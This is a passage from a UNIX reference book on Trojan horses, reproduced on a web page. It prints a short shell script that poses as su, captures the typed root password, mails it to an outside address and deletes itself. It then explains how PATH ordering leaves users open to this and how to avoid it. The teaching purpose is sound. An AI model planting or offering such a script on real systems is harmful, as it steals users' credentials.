Trojan Horses

Previous page
Table of content
Next page

A Trojan horse is a program that masquerades as another program or, in addition to doing what the genuine program does, performs some other unintended action. Often a Trojan horse masquerades as a commonly used program, such as ls. When a Trojan horse runs, it may send files to the intruder or simply change or erase files.

An example of a Trojan horse has been provided by Morris and Gramp in their article listed at the end of this chapter. Their example is a Trojan horse that masquerades as the su command. The shell script for the Trojan horse is placed in the file su in a directory in the path of the user. The shell script for this Trojan horse is given here:

 stty -echo                           #turn character echoing off echo "Password: \c"                  #echo "Password:" read X                               #assign input string to variable X echo ""                              #begin new line stty echo                            #turn character echo back on echo $1 $X | mail outside!creep &    #send logname and value of X to outside!creep sleep 1                              #wait 1 second echo Sorry.                          #echo "Sorry." rm su                                #remove the shell script for this program

Suppose that the PATH variable for this user is set so that the current directory precedes the directory containing the genuine su command. The following session takes place when the user runs the su command.

 $ su Password: ab2cof1   {entered password is not displayed} Sorry. $ su Password: ab2cof1   {entered password is not displayed}

This session starts with the user typing su, thinking this will run the superuser su command. Instead, the Trojan horse su command runs. The user enters the root password (which is not echoed back). The Trojan horse su command sends the logname and the password to outside!creep, compromising the user’s security The bogus su command removes itself after mailing the password. The user sees su fail and infers that the password has been mistyped. Then when the user runs su again, the genuine su program runs and the user can log in as superuser after entering the correct password.

This example shows that you may be vulnerable to a Trojan horse if the shell searches the current directory before searching system directories. Suppose you find this:

 $ echo $PATH :/bin:/usr/bin:/fred/bin

With this value for PATH, the current directory (represented by the empty field before the first colon) is the first directory searched by the shell when a command is entered.

On the other hand, if the path is set up this way,

 $ echo $PATH /bin:/usr/bin:/home/fred/bin:

the current directory is searched last by the shell when a command is entered.

Consequently, to avoid this type of Trojan horse, set your PATH variable with the empty field last, so that the current directory is searched last after system directories have been searched.



Previous page
Table of content
Next page
UNIX. The Complete Reference
UNIX: The Complete Reference, Second Edition (Complete Reference Series)
ISBN: 0072263369
EAN: 2147483647
Year: 2006
Pages: 316
Authors: Kenneth Rosen, Douglas Host, Rachel Klee, Richard Rosinski
BUY ON AMAZON
Interprocess Communications in Linux: The Nooks and Crannies
The .NET Developers Guide to Directory Services Programming
Software Configuration Management
Snort Cookbook
Google Maps Hacks: Tips & Tools for Geographic Searching and Remixing
Mastering Delphi 7
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy